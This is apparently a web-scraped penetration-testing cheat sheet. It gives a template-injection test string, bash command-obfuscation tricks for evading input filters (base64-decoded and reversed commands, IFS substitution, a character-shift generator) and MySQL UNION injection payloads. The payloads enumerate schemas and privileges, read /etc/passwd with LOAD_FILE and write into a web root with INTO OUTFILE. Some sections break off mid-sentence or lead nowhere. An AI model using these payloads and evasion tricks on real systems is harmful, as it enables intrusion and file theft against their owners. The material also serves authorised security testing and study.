The following string can be used to test a large number of templating engines in one go:
$ { { < % [ % ' " } } % \ .
[!IMPORTANT] Remove the spaces between each character! I’ve included them here because it messes up rendering in some places!
Inserting noop characters
Quotes (even number of non-mixed) will be ignored by bash. $ c'a't becomes $ cat. Similar for $ c"a"t
Backslashing chars (other than \n etc, obs) will have no effect. $ c\at becomes $ cat.
Use the positional param character $ c$@at becomes $ cat
Manipulate the characters
$(rev<<<'tac') becomes cat. Experiment with other things like rot13.
Encode the command
$(base64 -d<<<"Y2F0Cg==") becomes cat
Whitespace
%0a: newline%20: space%09: tab${IFS}: Input Field Separators ↗️ (typically space, tab, newline)- bash bracket expansion:
{ls,-la}turns intols -la
Special characters
- forward slash:
echo ${PATH:0:1} - semicolon:
echo ${LS_COLORS:10:1} - pipe: try using
<<<
Shifting characters
This command will shift a letter one to the right echo $(tr '!-}' '"-~'<<<[). e.g. ~ becomes !.
shift_generator() {
local shift=$1
local char=$2
local second_start=$((33 + shift))
local second_end=$((33 + shift - 1))
printf "echo \$(tr '\\!-~' '"
printf '%b-~\\!-%b' "$(printf '\\%03o' $second_start)" "$(printf '\\%03o' $second_end)"
printf "'<<<'%s')\n" "$char"
}
# usage
shift_generator 1 "~"
Tooling
For more advanced obfuscation you can consider tools such as:
Using a UNION injection we can find out about a (MySQL/MariaDB) structure.
Here are some minimal examples. Remember to determine the correct number of columns 🌿
and match that. Also clearly remember to add WHERE clauses to these to narrow down the search.
Databases
UNION SELECT SCHEMA_NAME from INFORMATION_SCHEMA.SCHEMATA;
Tables
UNION SELECT TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.TABLES;
Columns
UNION SELECT COLUMN_NAME,TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS;
Privileges
UNION SELECT GRANTEE, PRIVILEGE_TYPE FROM INFORMATION_SCHEMA.USER_PRIVILEGES
References
After enumerating user privileges 🌿
if you find one which has FILE you can use that to read files from the target.
UNION SELECT LOAD_FILE('/etc/passwd')
References
Tools
- sqlmap ↗️
has a
--proxyflag
Pro tip: remember to use proxychains 🌿 to proxy to burp for tools without proxy flags!
Techniques
Prerequisites
This should not be enabled on any modern secure systems, but if it is, you can use it to create a remote shell.
secure_file_priv ↗️
can have the following values:
null: cannot write anywhere on system""(empty string): can write anywhere"/path/to/dir": can write only to specified path
SHOW VARIABLES LIKE 'secure_file_priv';
You can get this by querying the information_schema using a union injection
UNION SELECT VARIABLE_NAME,VARIABLE_VALUE FROM INFORMATION_SCHEMA.GLOBAL_VARIABLES
Do it
SELECT "OOPS!" INTO OUTFILE "/var/www/html/poc.txt"
References
A union injection causes additional rows to be added to the result set by using the UNION clause. To do this, we need to know the number of columns in the target result set.
There are two easy strategies for this. Using order by or union. Assume that the following is vulnerable:
SELECT * from users where username='$oops'
order by
In MySQL you can use numeric arguments for order by which you can use to infer the number of columns. Let $oops = "test' order by 1 -- then the query becomes:
Here are some resources containing XSS payloads:
base64
echo 'test' | base64
echo 'dGVzdAo=' | base64 -d
hex
echo 'test' | xxd -p
echo '746573740a' | xxd -p -r
rot13
echo 'test' | tr 'A-Za-z' 'N-ZA-Mn-za-m'
echo 'grfg' | tr 'A-Za-z' 'N-ZA-Mn-za-m'